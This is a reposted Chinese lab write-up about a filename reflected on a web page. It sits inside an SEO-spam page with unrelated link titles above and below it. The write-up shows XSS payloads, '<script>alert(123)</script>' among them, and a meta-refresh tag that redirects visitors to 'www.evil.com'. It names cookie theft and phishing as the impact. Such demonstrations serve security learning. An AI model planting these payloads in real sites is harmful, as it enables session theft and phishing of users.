当前位置: 首页 > news >正文

做学校后台网站用什么浏览器官网整站优化

做学校后台网站用什么浏览器,官网整站优化,顺德网站制作案例教程,娄底网站建设挖个洞先 https://mp.weixin.qq.com/s/hnrm-snkETuR-gqPOSnQXQ “ 以下漏洞均为实验靶场,如有雷同,纯属巧合 ” 01 — 漏洞证明 一、反射型XSS “ 文件名回显,能否触发XSS?” 1、灯塔扫到敏感文件,发现1.txt会在…

挖个洞先
https://mp.weixin.qq.com/s/hnrm-snkETuR-gqPOSnQXQ

“ 以下漏洞均为实验靶场,如有雷同,纯属巧合 ”

01

漏洞证明

一、反射型XSS

“ 文件名回显,能否触发XSS?”

1、灯塔扫到敏感文件,发现1.txt会在页面回显文件名

在这里插入图片描述

2、修改文件名为del标签

在这里插入图片描述

payload:

<del>123</del>

3、修改文件名为script标签,触发XSS漏洞

payload:

<script>alert(123)</script>

在这里插入图片描述

二、URL重定向

“ 文件名回显,能否触发URL重定向?”

1、参考mdn对meta标签中content和http-equiv属性的定义

Web 开发技术 > HTML(超文本标记语言) > HTML 元素参考 >

https://developer.mozilla.org/zh-CN/docs/Web/HTML/Element/meta

在这里插入图片描述

2、修改文件名为meta标签,延迟1秒,自动重定向到第三方网站

payload:

<meta http-equiv="refresh" content="1 URL=http://www.evil.com">

在这里插入图片描述

3、重定向到第三方网站

在这里插入图片描述

02

漏洞危害

1、反射型XSS获取用户cookie或者执行恶意JS操作

2、URL重定向到仿冒网站导致用户账户被盗

在这里插入图片描述

http://www.hengruixuexiao.com/news/9484.html

相关文章:

  • 货代一般用什么网站开发客户seo顾问服
  • div做网站排版谷歌浏览器下载安装2021最新版
  • 重庆忠县网站建设郑州seo排名优化
  • 定制网站开发哪家强磁力狗在线引擎
  • 上海电子商务网站建设网店推广软文范例
  • 网站开发的技术意义优化深圳seo
  • 如何做黄色网站不犯法seo外包靠谱
  • 上海市建设咨询协会网站seo矩阵培训
  • 网站制作首先网站查询
  • wordpress网站发布时间青岛网络工程优化
  • 日本做a图片视频在线观看网站百度首页登录
  • 临沂网络公司惠州网站seo排名优化
  • 聊城网站设计百度推广平台收费标准
  • 贵阳哪里可以做网站品牌公关具体要做些什么
  • 计算机网站开发毕业论文题目大全推广平台怎么找客源
  • 禅城区企业网站建设郑州全域静态管理
  • 长沙网上商城网站建设方案互联网营销师培训教材
  • 厦门微信网站建设什么软件可以刷网站排名
  • 临泉县建设局网站seo是什么
  • 做网站实名认证有什么用2023年6月份疫情严重吗
  • 网站内容的创新购物网站页面设计
  • 4399小游戏在线玩网页版高级seo招聘
  • 浙江建设委员会官方网站站长工具怎么关掉
  • 东莞茶山网站建设什么叫seo网络推广
  • html公司网页保定seo排名优化
  • 中国建设银行淮南分行网站怎么把网站排名排上去
  • 生意宝做网站行吗google高级搜索
  • 做网站九州科技seo核心技术排名
  • o2o网站建设包括哪些网络营销的四大特点
  • 国外网站建设的研究现状网站seo运营